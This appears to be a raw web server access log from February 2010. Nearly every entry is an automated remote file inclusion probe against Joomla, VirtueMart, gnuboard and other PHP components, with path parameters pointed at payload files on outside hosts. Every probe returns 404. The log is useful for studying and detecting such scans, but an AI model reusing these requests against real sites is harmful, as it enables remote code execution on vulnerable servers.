81.176.226.164 - - [07/Feb/2010:07:41:01 -0800] "GET /logs/access_100121.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:07:41:15 -0800] "GET /logs/access_100201.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:41:16 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:41:16 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:41:16 -0800] "GET /logs/access_100113.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:41:20 -0800] "GET /logs/access_100122.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:41:50 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:41:50 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:41:50 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:41:56 -0800] "GET /logs/access_100118.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:41:58 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:01 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:08 -0800] "GET /logs/access_100111.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:07:42:10 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cnkabu.com/test.gif?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:07:42:10 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cnkabu.com/test.gif?? HTTP/1.0" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:14 -0800] "GET /logs/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:21 -0800] "GET /shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:24 -0800] "GET /logs/access_100106.log/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:42:32 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:42:33 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:42:33 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:42:48 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:42:48 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:42:48 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:42:49 -0800] "GET /logs/access_100127.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:42:55 -0800] "GET /logs/access_100113.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:42:55 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:42:55 -0800] "GET /logs/access_100122.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:42:55 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:05 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:05 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:05 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:11 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:11 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:11 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:07:43:31 -0800] "GET /logs/access_100107.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:07:43:31 -0800] "GET /logs//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:31 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:31 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:31 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:07:43:31 -0800] "GET /errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [07/Feb/2010:07:43:41 -0800] "GET /logs/access_100112.log//errors.php?error=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:44 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:44 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:44 -0800] "GET /logs/access_100121.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:43:44 -0800] "GET /logs/access_100120.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:43:54 -0800] "GET /shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:43:55 -0800] "GET /logs/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:43:55 -0800] "GET /logs/access_100106.log%20%20/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:09 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:10 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:10 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:44:13 -0800] "GET /logs//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:44:13 -0800] "GET /gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:44:13 -0800] "GET /logs/access_100202.log%20%20//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:07:44:15 -0800] "GET /logs/access_100105.log/shop/main.php?_shop_path=http://www.hfsb.org/sites/10225/img/.patch/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:44:29 -0800] "GET /logs/access_100129.log%20%20//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:33 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:41 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:44:46 -0800] "GET /logs/access_100124.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:44:56 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:44:56 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:44:56 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:45:55 -0800] "GET /logs/access_100109.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:45:56 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
109.72.80.134 - - [07/Feb/2010:07:45:57 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:07:46:09 -0800] "GET /logs/access_091210.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:07:46:34 -0800] "GET /logs/access_100109.log///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:07:46:35 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
88.198.197.249 - - [07/Feb/2010:07:46:35 -0800] "GET /logs///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:09 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:09 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:14 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.1.150.2 - - [07/Feb/2010:07:47:14 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bethelphotoworks.com/css/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:47:45 -0800] "GET /logs//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:47:45 -0800] "GET /gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:47:45 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:47:45 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/write_update.php//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:12 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:12 -0800] "GET /logs/access_100114.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:12 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:48:17 -0800] "GET /logs/access.log%20%20///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:48:17 -0800] "GET //write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:48:17 -0800] "GET /logs///write_update.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:40 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:40 -0800] "GET /logs/access_100114.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:40 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:57 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:57 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:48:57 -0800] "GET /logs/access_100114.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:49:05 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:49:06 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:49:06 -0800] "GET /logs/access_100115.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:49:26 -0800] "GET /logs//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:49:26 -0800] "GET /gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:49:26 -0800] "GET /logs/access_100202.log%20%20//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.190.33.158 - - [07/Feb/2010:07:49:33 -0800] "GET /logs/access_100110.log%20%20///administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:49:42 -0800] "GET /logs/access_100129.log%20%20//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:07:49:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cnkabu.com/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
216.17.109.216 - - [07/Feb/2010:07:49:52 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cnkabu.com/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.puaga.com"
116.40.122.117 - - [07/Feb/2010:07:49:54 -0800] "GET /logs/access_100114.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:49:58 -0800] "GET /logs//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:49:58 -0800] "GET /admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:49:58 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:08 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:08 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:50:08 -0800] "GET /logs/access_100113.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
